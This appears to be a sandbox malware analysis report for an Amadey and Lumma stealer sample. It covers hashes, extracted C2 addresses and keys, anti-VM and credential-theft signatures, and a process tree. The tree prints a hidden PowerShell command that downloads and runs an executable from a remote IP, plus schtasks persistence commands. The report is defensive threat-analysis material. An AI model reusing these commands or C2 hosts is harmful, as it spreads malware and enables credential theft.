Overview

overview

10

Static

static

5

2025-04-06...er.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/04/2025, 06:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-04-06_c12af6657af1290febca1788ab396c7b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    c12af6657af1290febca1788ab396c7b

  • SHA1

    39ef6d76d8785236c83968559d83cfceff333fd3

  • SHA256

    f9c0dc25b85a42a8c0ce701d101c7cbeb96d558f22b1187c8f9d1482368326b1

  • SHA512

    1ce33a52efd9312285f2cfe95b78965ed9d53a64e89eac94a9c15a6abeeba4e11e6e8e6c3d44fc825546b14e6901ffad53c38d6e15794a9d37767185f31b9211

  • SSDEEP

    24576:ZqDEvCTbMWu7rQYlBQcBiT6rprG8a0zu:ZTvC/MTQYxsWR7a0z

Score
10/10
amadeylumma092155defense_evasiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 3 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-06_c12af6657af1290febca1788ab396c7b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-06_c12af6657af1290febca1788ab396c7b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 9IOPgmaInWf /tr "mshta C:\Users\Admin\AppData\Local\Temp\KsDgqc18C.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4488
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn 9IOPgmaInWf /tr "mshta C:\Users\Admin\AppData\Local\Temp\KsDgqc18C.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3244
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\KsDgqc18C.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3056
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XMB5JNV3OBK1HU9EWSKH4YPVF7JTJIYE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:788
        • C:\Users\Admin\AppData\Local\TempXMB5JNV3OBK1HU9EWSKH4YPVF7JTJIYE.EXE
          "C:\Users\Admin\AppData\Local\TempXMB5JNV3OBK1HU9EWSKH4YPVF7JTJIYE.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2148
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4636
            • C:\Users\Admin\AppData\Local\Temp\10473520101\ed5760b304.exe
              "C:\Users\Admin\AppData\Local\Temp\10473520101\ed5760b304.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4028
            • C:\Users\Admin\AppData\Local\Temp\10473530101\142f959403.exe
              "C:\Users\Admin\AppData\Local\Temp\10473530101\142f959403.exe"
              6⤵
              • Executes dropped EXE
              PID:1880
            • C:\Users\Admin\AppData\Local\Temp\10473540101\77477810e3.exe
              "C:\Users\Admin\AppData\Local\Temp\10473540101\77477810e3.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1520
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn FELCHmanFI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\weeKVy9qN.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3484
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn FELCHmanFI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\weeKVy9qN.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2416
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\weeKVy9qN.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1536
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ALFEQHK5I3AOFXO7MISZPGBP64VJ2AJK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1660
                  • C:\Users\Admin\AppData\Local\TempALFEQHK5I3AOFXO7MISZPGBP64VJ2AJK.EXE
                    "C:\Users\Admin\AppData\Local\TempALFEQHK5I3AOFXO7MISZPGBP64VJ2AJK.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5028
            • C:\Users\Admin\AppData\Local\Temp\10473550101\fbb881ce07.exe
              "C:\Users\Admin\AppData\Local\Temp\10473550101\fbb881ce07.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2560
  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3948
  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:2820

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    25604a2821749d30ca35877a7669dff9

    SHA1

    49c624275363c7b6768452db6868f8100aa967be

    SHA256

    7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

    SHA512

    206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    16KB

    MD5

    92034bf8f44e3db8ee522317cff83138

    SHA1

    0dad1e9d0f23320d7656533ba2661ca9159b55e7

    SHA256

    a80424dd16dc1b6766b63c33ae9ecee44ca529c15083742d742e47fc9ea7d020

    SHA512

    64eb8919fead33e13cc79dfbb6527b7821afa55f74a6ddef0a7bdab40d82e26a760f93f01f5d7518ab70dd592225dc5571cdb3e97a2b223d60598b2dcf96f585

    Download Submit

  • C:\Users\Admin\AppData\Local\TempXMB5JNV3OBK1HU9EWSKH4YPVF7JTJIYE.EXE
    Filesize

    1.8MB

    MD5

    0d397828202c894e2ef844b26e254853

    SHA1

    643c9fa847acfab19a151de57596d88be6d5fd11

    SHA256

    d26022e6a7e6e4fc7daba48705a49845fe73acd2630d577937cde2c9948b4614

    SHA512

    5bd441e7357ff7ef1367e5257bc569ec43f365cd80e95629138644e593d93b458f76aa7339468e2e175362b0f6013e12f71906218ebf532aeaf09347f1ec6661

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10473520101\ed5760b304.exe
    Filesize

    716KB

    MD5

    57a5e092cf652a8d2579752b0b683f9a

    SHA1

    6aad447f87ab12c73411dec5f34149034c3027fc

    SHA256

    29054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34

    SHA512

    5759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10473520101\ed5760b304.exe
    Filesize

    358KB

    MD5

    e604fe68e20a0540ee70bb4bd2d897d0

    SHA1

    00a4d755d8028dbe2867789898b1736f0b17b31c

    SHA256

    6262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361

    SHA512

    996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10473530101\142f959403.exe
    Filesize

    1.4MB

    MD5

    f3f9535109155498021e63c23197285f

    SHA1

    cf2198f27d4d8d4857a668fa174d4753e2aa1dca

    SHA256

    1ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f

    SHA512

    a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10473530101\142f959403.exe
    Filesize

    730KB

    MD5

    31aeed8d880e1c68a97f0d8739a5df8a

    SHA1

    d6f140d63956bc260639ab3c80f12a0e9b010ee9

    SHA256

    bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97

    SHA512

    bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10473540101\77477810e3.exe
    Filesize

    938KB

    MD5

    80c49aa4e5d9835db12f5b1f3e52136b

    SHA1

    22d16ccc02ab2f797e948dac092666a952269f13

    SHA256

    ec17595441a9f813ecd87ac3655a6ef4cd50721a01813375d9680a3ac00fa225

    SHA512

    36e08978a6c479f9beff746728914436cffe098bf3286f28c08ba7603e00a737a7a605960fd5dc447d4ada1ccbadb5d829ad262ec3036b463965499e57dd7129

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\10473550101\fbb881ce07.exe
    Filesize

    1.8MB

    MD5

    e5ce7c7822d6ae95ea7df9a6bec47195

    SHA1

    1d52d18943beed15b7354731c7073ca0e05bd991

    SHA256

    d774cec2801f9e42a38553dcc558e80cdd83b5e89aebde3a6528d695f105b85a

    SHA512

    68f5d360a1e8c505431238b825fe8d0c461e99fc78884005517fec13d5a494ddb771a06a8bdc544e734744b90b9ef223284ef6f6d77c67f70666728599cae562

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\KsDgqc18C.hta
    Filesize

    717B

    MD5

    1b252c01ac1f27bedc5481562d3d6c7c

    SHA1

    cf92d46d8413da377bd2c2014cc90dc42cbaa3b5

    SHA256

    a809e1f8dcd456888e5c7bcde16ad0d762f569ec3a7b58558db9b1b965176ab2

    SHA512

    ebb7d90f3b214941147b107dfeb29c0d46e77415070af3ee3b508e936bb1a69b3a8991c700cd81e51b32e5044867e1616778f0cc4df4d20e805a962d25435025

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mf5ykm05.n3a.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\weeKVy9qN.hta
    Filesize

    717B

    MD5

    2f978244336663ee796d7c5f34b9bd3a

    SHA1

    49ed74fe24951f665dc76ad23e8eb90ce870be96

    SHA256

    b4799736b9fcc1911c8c41cf94eda78c4e31e90fd8cff4c1eb25883621ab8136

    SHA512

    f15f48b32e243fcd9e7b6dfdfd9927f777237eaabfb339b9ff45429e1f433da466f1ea2e075538ccb292a3f23edbb72cde10a33d9025f11bbdc4bdcfa4fffc8e

    Download Submit

  • memory/788-22-0x0000000007510000-0x00000000075A6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/788-6-0x00000000059F0000-0x0000000005A56000-memory.dmp

    Filesize

    408KB

    Download

  • memory/788-24-0x00000000083A0000-0x0000000008944000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/788-20-0x0000000006560000-0x000000000657A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/788-3-0x0000000005180000-0x00000000057A8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/788-4-0x00000000057E0000-0x0000000005802000-memory.dmp

    Filesize

    136KB

    Download

  • memory/788-5-0x0000000005980000-0x00000000059E6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/788-19-0x0000000007770000-0x0000000007DEA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/788-18-0x0000000006090000-0x00000000060DC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/788-23-0x00000000074A0000-0x00000000074C2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/788-2-0x0000000002A70000-0x0000000002AA6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/788-17-0x0000000006060000-0x000000000607E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/788-16-0x0000000005A60000-0x0000000005DB4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1660-110-0x0000000005490000-0x00000000057E4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1660-112-0x00000000060F0000-0x000000000613C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/2148-48-0x00000000004A0000-0x0000000000952000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/2148-32-0x00000000004A0000-0x0000000000952000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/2560-141-0x0000000000D20000-0x00000000011C0000-memory.dmp

    Filesize

    4.6MB

    Download

  • memory/2560-140-0x0000000000D20000-0x00000000011C0000-memory.dmp

    Filesize

    4.6MB

    Download

  • memory/2820-155-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/3948-147-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-148-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-150-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-113-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-65-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-142-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-143-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-144-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-64-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-158-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-157-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-149-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-151-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-152-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-153-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-46-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/4636-156-0x0000000000AC0000-0x0000000000F72000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/5028-125-0x0000000000380000-0x0000000000832000-memory.dmp

    Filesize

    4.7MB

    Download

  • memory/5028-122-0x0000000000380000-0x0000000000832000-memory.dmp

    Filesize

    4.7MB

    Download